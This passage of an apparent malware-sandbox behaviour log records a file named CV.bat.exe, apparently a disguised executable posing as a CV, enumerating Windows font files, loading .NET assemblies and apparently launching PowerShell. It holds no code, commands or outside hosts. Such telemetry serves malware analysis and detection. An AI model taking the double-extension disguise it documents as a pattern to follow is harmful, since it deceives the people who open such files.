Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
